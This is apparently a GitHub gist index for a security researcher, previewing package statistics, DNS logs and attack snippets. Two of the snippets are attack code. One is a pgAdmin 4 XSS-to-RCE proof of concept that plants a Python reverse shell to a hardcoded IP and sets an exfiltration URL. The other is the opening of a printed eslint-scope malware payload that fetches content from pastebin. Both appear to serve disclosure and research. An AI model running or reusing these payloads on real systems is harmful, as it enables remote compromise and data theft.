Skip to content

Instantly share code, notes, and snippets.

View evilpacket's full-sized avatar
:octocat:

Adam Baldwin evilpacket

:octocat:
584 followers · 0 following
View GitHub Profile
@evilpacket
evilpacket / gist:3924845
Created October 20, 2012 21:14
Available Lua functions in Redis 2.6
_G.__redis__compare_helper()
_G.assert()
_G.collectgarbage()
_G.getfenv()
_G.getmetatable()
_G.newproxy()
_G.next()
_G.pcall()
_G.print()
_G.rawequal()
@evilpacket
evilpacket / build.js
Created July 13, 2018 00:31
eslint-scope payload
try {
var https = require("https");
https
.get(
{
hostname: "pastebin.com",
path: "/raw/XLeVP82h",
headers: {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
@evilpacket
evilpacket / binary + download count
Created May 6, 2018 22:15
ws: 18300469
fsevents: 17784701
gaze: 11832681
node-sass: 8865218
bson: 2686185
uws: 2360991
dtrace-provider: 1567984
pg: 1407674
grpc: 1137348
iltorb: 932043
@evilpacket
evilpacket / packages with bindings.gyp in root
Created May 6, 2018 21:49
17monip
2wire
3000
3drotate
51degrees
64
7lab_groove_test
7zjs
@a-sync/opencv4nodejs
@achingbrain/node-syslog
@evilpacket
evilpacket / cmd_exec.js
Created April 16, 2017 17:43
pgAdmin 4 (1.3 and below) RCE via XSS
// select '<img src="x" onerror=$.getScript("http://127.0.0.1:8000/cmd_exec.js") />';
// multi-query payload for RCE
var queries = ['create language plpythonu','CREATE OR REPLACE FUNCTION pwn() RETURNS text\\nLANGUAGE plpythonu\\nAS $$\\nimport socket,subprocess,os\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\\"162.242.167.28\\",4445))\\nos.dup2(s.fileno(),0)\\nos.dup2(s.fileno(),1)\\nos.dup2(s.fileno(),2)\\na=subprocess.Popen([\\"/bin/sh\\",\\"-i\\"])\\nreturn \\"\\"\\n$$;\\n', 'select pwn()']
//queries = ['select current_user']
var exfil_url = 'http://requestb.in/16wy0z61'
@evilpacket
evilpacket / Download stuff over HTTP
Created August 8, 2017 15:14
"name","version"
"tarantul","0.8.86"
"tarantul","0.8.86"
"tarantul","0.8.84"
"tarantul","0.8.84"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"youstream","0.1.2"
"zookeeper-rp","3.4.5-2"
@evilpacket
evilpacket / gist:ee2a94b812640ce749b5a936ca243235
Created August 8, 2017 15:04
module dns requests
5752dabccfc54c4ab82aea9626b7338e.monitor-eqatec.com
7af4ds.com2.z0.glb.qiniucdn.com
7rylsh.com1.z0.glb.clouddn.com
7xojg5.com1.z0.glb.clouddn.com
7xov2q.dl1.z0.glb.clouddn.com
acsc.cs.utexas.edu
admin.brightcove.com
airdownload.adobe.com
ajax.googleapis.com
akamai.bintray.com
@evilpacket
evilpacket / gist:e9f1ee472628e64ba358996106861e07
Created June 26, 2017 20:11
4633514 - path
3569836 - fs
1646083 - util
1477850 - assert
896187 - events
820144 - buffer
766000 - child_process
642174 - http
534563 - url
424279 - crypto
@evilpacket
evilpacket / botbait results
Created November 9, 2016 15:38
{
"id": 7,
"created_at": "2015-06-23T21:04:11.995Z",
"process_versions": {
"http_parser": "1.0",
"node": "0.10.13",
"v8": "3.14.5.9",
"ares": "1.9.0-DEV",
"uv": "0.10.12",
"zlib": "1.2.3",
@evilpacket
evilpacket / gist:55c16b0e3d9edc0fe1a114cc16c03e68
Created November 11, 2016 22:40
var fs = require('fs');
var JSONStream = require('jsonstream');
var infile = fs.createReadStream(__dirname + '/' + process.argv[2]);
var stream = JSONStream.parse(['rows', true, 'doc'])
infile.pipe(stream);
stream.on('data', function(data) {